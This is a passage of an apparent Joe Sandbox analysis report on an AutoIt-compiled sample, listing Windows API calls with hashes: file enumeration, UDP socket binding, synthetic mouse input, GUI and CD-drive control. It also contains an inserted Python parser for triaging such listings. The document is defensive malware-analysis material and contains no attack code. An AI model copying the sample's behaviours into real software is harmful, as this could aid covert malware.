                                                                • Part of subcall function 00CC41CE: GetInputState.USER32 ref: 00CC4225
                                                                • Part of subcall function 00CC41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC42C0
                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CCA505
                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CCA5D2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                              • String ID: *.*
                                                              • API String ID: 1972594611-438819550
                                                              • Opcode ID: bcdf74ad1ac9900e559b7a91e33eaaec833ddcfd610d039a40dd6df844122ed1
                                                              • Instruction ID: 45198c95aaee1b7f8371dc7eefba8f4350527b523e21f257be9dd5b1ac6cb4c0
                                                              • Opcode Fuzzy Hash: bcdf74ad1ac9900e559b7a91e33eaaec833ddcfd610d039a40dd6df844122ed1
                                                              • Instruction Fuzzy Hash: 0E41807190020EAFCF14DF64C849FEEBBB4EF05315F24805AE815A61A1E7709F84DB61
                                                              APIs
                                                              • DefDlgProcW.USER32(?,?), ref: 00C522EE
                                                              • GetSysColor.USER32(0000000F), ref: 00C523C3
                                                              • SetBkColor.GDI32(?,00000000), ref: 00C523D6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Color$Proc
                                                              • String ID:
                                                              • API String ID: 929743424-0
                                                              • Opcode ID: 491f02776c2ebf3799f728e47eaa565d46a2b7e2c9141464aefa64ead315c43c
                                                              • Instruction ID: a4b1764100b2b64e8767e982a1b373b8358949c6a8b3460581647deb45c75895
                                                              • Opcode Fuzzy Hash: 491f02776c2ebf3799f728e47eaa565d46a2b7e2c9141464aefa64ead315c43c
                                                              • Instruction Fuzzy Hash: 37812AF8204194BEEA39663E8D5DE7F25CDDB43311F180109F952C55A1CB298F85E23E
                                                              APIs
                                                                • Part of subcall function 00CD39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CD39D7
                                                                • Part of subcall function 00CD39AB: _wcslen.LIBCMT ref: 00CD39F8
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CD21BA
                                                              • WSAGetLastError.WSOCK32 ref: 00CD21E1
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00CD2238
                                                              • WSAGetLastError.WSOCK32 ref: 00CD2243
                                                              • closesocket.WSOCK32(00000000), ref: 00CD2272
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 1601658205-0
                                                              • Opcode ID: e7381a052191231ea237070bfa0805afe8334db4e86f6f771bb6fd9111c0780c
                                                              • Instruction ID: b7e7ed8c26eeeb7430911945d2395b33588d5a69bbe88f3f05d25e929c182a67
                                                              • Opcode Fuzzy Hash: e7381a052191231ea237070bfa0805afe8334db4e86f6f771bb6fd9111c0780c
                                                              • Instruction Fuzzy Hash: C251C475600200AFD720AF64C8C6F2E77E5AB45714F088089FA16AF3D3CA71AD85DBE1
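Joe Sandbox prints every call of a function in one fixed line shape ("Name.MODULE(args), ref: ADDRESS", with calls made from a callee prefixed by "Part of subcall function ADDRESS:"), so a long listing like this one is easier to triage by machine than by eye. The parser below is an added example for this page, not Joe Sandbox code and not code recovered from the sample; SAMPLE_LISTING is copied from the directory-walk and UDP-socket functions above, and the Winsock constant tables and the NETWORK_MODULES set are the example's own choices. It turns the lines into records, keeps the subcall parent address, renders socket(00000002,00000002,00000011,...) as socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), and counts the "?" arguments the sandbox could not resolve.

```python
"""
Parse the 'APIs' lines of a Joe Sandbox function listing into records and
decode the argument constants that matter when triaging the listing.
Added example for this report: not Joe Sandbox code, not the sample's code.
SAMPLE_LISTING is copied from the report (directory walk + UDP socket).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_LISTING = """
APIs
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CCA5E8
  • Part of subcall function 00CC41CE: GetInputState.USER32 ref: 00CC4225
  • Part of subcall function 00CC41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC42C0
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CCA505
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CCA5D2
APIs
  • Part of subcall function 00CD39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CD39D7
  • Part of subcall function 00CD39AB: _wcslen.LIBCMT ref: 00CD39F8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CD21BA
• WSAGetLastError.WSOCK32 ref: 00CD21E1
• bind.WSOCK32(00000000,?,00000010), ref: 00CD2238
• WSAGetLastError.WSOCK32 ref: 00CD2243
• closesocket.WSOCK32(00000000), ref: 00CD2272
"""

# One report line: optional subcall prefix, Name.MODULE, optional (args), ref: ADDR
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # raw hex strings; "?" = value not resolved by the sandbox
    ref: int                 # address of the call site
    parent: Optional[int]    # address of the callee when the line is a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the call records in a listing; headings such as 'APIs' are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), parent))
    return calls


# Winsock constants as Joe Sandbox prints them (8-digit hex). Assumed tables,
# limited to the values a triage analyst meets most often.
AF = {"00000002": "AF_INET", "00000017": "AF_INET6"}
SOCK = {"00000001": "SOCK_STREAM", "00000002": "SOCK_DGRAM", "00000003": "SOCK_RAW"}
PROTO = {"00000000": "0", "00000006": "IPPROTO_TCP", "00000011": "IPPROTO_UDP"}
NETWORK_MODULES = {"WSOCK32", "WS2_32", "WININET", "WINHTTP"}  # assumed list


def decode_socket(call: ApiCall) -> str:
    """Render a socket() call with symbolic constants, keeping unknowns as-is."""
    fam, typ, proto = (call.args + ["?", "?", "?"])[:3]
    return "socket(%s, %s, %s)" % (AF.get(fam, fam), SOCK.get(typ, typ), PROTO.get(proto, proto))


def triage(text: str) -> dict:
    """Summary an analyst wants first: how much network API, which sockets, how much is unresolved."""
    calls = parse_api_lines(text)
    net = [c for c in calls if c.module.upper() in NETWORK_MODULES]
    return {
        "calls": len(calls),
        "subcalls": sum(1 for c in calls if c.parent is not None),
        "network_apis": sorted({c.name for c in net}),
        "sockets": [decode_socket(c) for c in calls if c.name == "socket"],
        "unresolved_args": sum(c.args.count("?") for c in calls),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LISTING).items():
        print(key, value)
```

The parser deliberately keeps the subcall parent address rather than flattening it away: a network call that only appears as "Part of subcall function" is reachable from the listed function but is not its own code, which matters when you map which function in the interpreter actually opens the socket.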
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 39bc4019dd86b82b4cd652e3e7bd170cf727ac5a5ac645fba8eba48a9459cf9c
                                                              • Instruction ID: f051a82c88f643c542e0cf1d156450a6ed4a3ab172209c915fc231d4e9534501
                                                              • Opcode Fuzzy Hash: 39bc4019dd86b82b4cd652e3e7bd170cf727ac5a5ac645fba8eba48a9459cf9c
                                                              • Instruction Fuzzy Hash: 0721E5313012C08FD7108F17C894B5A7B9DEF94314F188469F84ACB252DB71EE42CB90
                                                              APIs
                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00CBEC19
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID: DOWN
                                                              • API String ID: 2434400541-711622031
                                                              • Opcode ID: 6c9844c2acb37f0803c085e7fa9851af787a5e27a5b5c1aaa499ff74f0634327
                                                              • Instruction ID: 814c0275bbaf1cc43ffdabd92c407752edfd80f2991400c1f9a91490ba57edbb
                                                              • Opcode Fuzzy Hash: 6c9844c2acb37f0803c085e7fa9851af787a5e27a5b5c1aaa499ff74f0634327
                                                              • Instruction Fuzzy Hash: 25E08C6A19D7223CB9182118BC02EF6038C8F26B34B51424AF851E81C0EE905E86A1B9
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00CE0C44
                                                              • _wcslen.LIBCMT ref: 00CE0C7E
                                                              • _wcslen.LIBCMT ref: 00CE0CE8
                                                              • _wcslen.LIBCMT ref: 00CE0D50
                                                              • _wcslen.LIBCMT ref: 00CE0DD4
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CE0E24
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CE0E63
                                                                • Part of subcall function 00C6FD60: _wcslen.LIBCMT ref: 00C6FD6B
                                                                • Part of subcall function 00CB2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CB2AE8
                                                                • Part of subcall function 00CB2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CB2B1A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 1103490817-719923060
                                                              • Opcode ID: e82b951c69b753e0df5aad151e74354f7e0078c4f0d0c5848882a55917433178
                                                              • Instruction ID: bf93b0b0d1603904a5248dd8b462bc998e7389db93e538cf112ce45172fda7b7
                                                              • Opcode Fuzzy Hash: e82b951c69b753e0df5aad151e74354f7e0078c4f0d0c5848882a55917433178
                                                              • Instruction Fuzzy Hash: BAE1E4352043819FC714DF26C88186AB3E6FF94314F24496DF8A69B392DB70EE85DB91
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C5259A
                                                              • GetSystemMetrics.USER32(00000007), ref: 00C525A2
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C525CD
                                                              • GetSystemMetrics.USER32(00000008), ref: 00C525D5
                                                              • GetSystemMetrics.USER32(00000004), ref: 00C525FA
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C52617
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C52627
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C5265A
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C5266E
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00C5268C
                                                              • GetStockObject.GDI32(00000011), ref: 00C526A8
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C526B3
                                                                • Part of subcall function 00C519CD: GetCursorPos.USER32(?), ref: 00C519E1
                                                                • Part of subcall function 00C519CD: ScreenToClient.USER32(00000000,?), ref: 00C519FE
                                                                • Part of subcall function 00C519CD: GetAsyncKeyState.USER32(00000001), ref: 00C51A23
                                                                • Part of subcall function 00C519CD: GetAsyncKeyState.USER32(00000002), ref: 00C51A3D
                                                              • SetTimer.USER32(00000000,00000000,00000028,00C5199C), ref: 00C526DA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 2ee0b31fd1c9c80442dbe2a5a5fca6a55ec5af9ae3b62a14d26783c64f14bc8c
                                                              • Instruction ID: 5452c7e151742650b71c63697d9e7b600157bcab9bdc3be1c6933255f6b03de6
                                                              • Opcode Fuzzy Hash: 2ee0b31fd1c9c80442dbe2a5a5fca6a55ec5af9ae3b62a14d26783c64f14bc8c
                                                              • Instruction Fuzzy Hash: A8B18A75600249AFCB14DFA8CC89BAE7BA4EB48315F114229FE16EA290D770D981CF54
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CE8CB9
                                                              • _wcslen.LIBCMT ref: 00CE8CCD
                                                              • _wcslen.LIBCMT ref: 00CE8CF0
                                                              • _wcslen.LIBCMT ref: 00CE8D13
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CE8D51
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CE6551), ref: 00CE8DAD
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CE8DE6
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CE8E29
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CE8E60
                                                              • FreeLibrary.KERNEL32(?), ref: 00CE8E6C
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CE8E7C
                                                              • DestroyIcon.USER32(?,?,?,?,?,00CE6551), ref: 00CE8E8B
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CE8EA8
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CE8EB4
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 799131459-1154884017
                                                              • Opcode ID: 7f3c715bbc2fe3b704a08d8a1b169814f8423cfb519f1cae5ebf8ae0bec58dd7
                                                              • Instruction ID: 6f3a742ecbbc5d73a7adc51a427bd9dc1d4f15791ed4b610ef30d8e89c832849
                                                              • Opcode Fuzzy Hash: 7f3c715bbc2fe3b704a08d8a1b169814f8423cfb519f1cae5ebf8ae0bec58dd7
                                                              • Instruction Fuzzy Hash: 3461DEB1500255BEEB14DF65CC81BBE77A8BB08711F108506F929DA1D0DFB59A88DBA0
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 00CC4852
                                                              • _wcslen.LIBCMT ref: 00CC485D
                                                              • _wcslen.LIBCMT ref: 00CC48B4
                                                              • _wcslen.LIBCMT ref: 00CC48F2
                                                              • GetDriveTypeW.KERNEL32(?), ref: 00CC4930
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC4978
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC49B3
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC49E1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1839972693-4113822522
                                                              • Opcode ID: 162fd02fb18527de99659751ef9ff7a960298b00157d03b958e8a1154d363ce8
                                                              • Instruction ID: 4f830901f27b9c6d30d967386c44dc7cb791fa8c230e9ba9d6f32a38c100c374
                                                              • Opcode Fuzzy Hash: 162fd02fb18527de99659751ef9ff7a960298b00157d03b958e8a1154d363ce8
                                                              • Instruction Fuzzy Hash: 7E71F3365042129FC714EF24C890A6FB7F5EF94754F00892CF8A6972A1EB30DE89DB91
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 00CB62BD
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CB62CF
                                                              • SetWindowTextW.USER32(?,?), ref: 00CB62E6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00CB62FB
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CB6301
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00CB6311
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CB6317
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CB6338
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CB6352
                                                              • GetWindowRect.USER32(?,?), ref: 00CB635B
                                                              • _wcslen.LIBCMT ref: 00CB63C2
                                                              • SetWindowTextW.USER32(?,?), ref: 00CB63FE
                                                              • GetDesktopWindow.USER32 ref: 00CB6404
                                                              • GetWindowRect.USER32(00000000), ref: 00CB640B
                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00CB6462
                                                              • GetClientRect.USER32(?,?), ref: 00CB646F
                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00CB6494
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CB64BE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                              • String ID:
                                                              • API String ID: 895679908-0
                                                              • Opcode ID: 53d400db40737b439ebbddd3f7e1b56c2dc6aa3933a6ba36eb3224fae7904295
                                                              • Instruction ID: 6709cdda6a210d1ac0a15e2137fae487c6ee568eca9e66612d22dbb1a9cf155d
                                                              • Opcode Fuzzy Hash: 53d400db40737b439ebbddd3f7e1b56c2dc6aa3933a6ba36eb3224fae7904295
                                                              • Instruction Fuzzy Hash: 88718131900745AFDB20DFA9CE85BAEBBF5FF48705F104928E156A62A0D779EA44CF10
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00CD0784
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00CD078F
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00CD079A
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00CD07A5
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00CD07B0
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00CD07BB
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00CD07C6
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00CD07D1
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00CD07DC
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00CD07E7
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00CD07F2
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00CD07FD
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00CD0808
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00CD0813
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00CD081E
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00CD0829
                                                              • GetCursorInfo.USER32(?), ref: 00CD0839
                                                              • GetLastError.KERNEL32 ref: 00CD087B
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                              • String ID:
                                                              • API String ID: 3215588206-0
                                                              • Opcode ID: db83d012a7aa10f4de75d1cb26cfc8d17b51664f52bdcd63c58139e91595a7cd
                                                              • Instruction ID: 3c2399688710f59ba8e8fe2c66eb212d5a82570c0c477c72900be1c045d053c1
                                                              • Opcode Fuzzy Hash: db83d012a7aa10f4de75d1cb26cfc8d17b51664f52bdcd63c58139e91595a7cd
                                                              • Instruction Fuzzy Hash: 524143B0D083196ADB10DFBA8C8995EBFE8FF04754B50452AE11DEB291DB78E901CF91
                                                              APIs
                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C70456
                                                                • Part of subcall function 00C7047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00D2170C,00000FA0,45F80808,?,?,?,?,00C92753,000000FF), ref: 00C704AC
                                                                • Part of subcall function 00C7047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C92753,000000FF), ref: 00C704B7
                                                                • Part of subcall function 00C7047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C92753,000000FF), ref: 00C704C8
                                                                • Part of subcall function 00C7047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C704DE
                                                                • Part of subcall function 00C7047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C704EC
                                                                • Part of subcall function 00C7047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C704FA
                                                                • Part of subcall function 00C7047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C70525
                                                                • Part of subcall function 00C7047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C70530
                                                              • ___scrt_fastfail.LIBCMT ref: 00C70477
                                                                • Part of subcall function 00C70433: __onexit.LIBCMT ref: 00C70439
                                                              Strings
                                                              • InitializeConditionVariable, xrefs: 00C704D8
                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C704B2
                                                              • WakeAllConditionVariable, xrefs: 00C704F2
                                                              • SleepConditionVariableCS, xrefs: 00C704E4
                                                              • kernel32.dll, xrefs: 00C704C3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
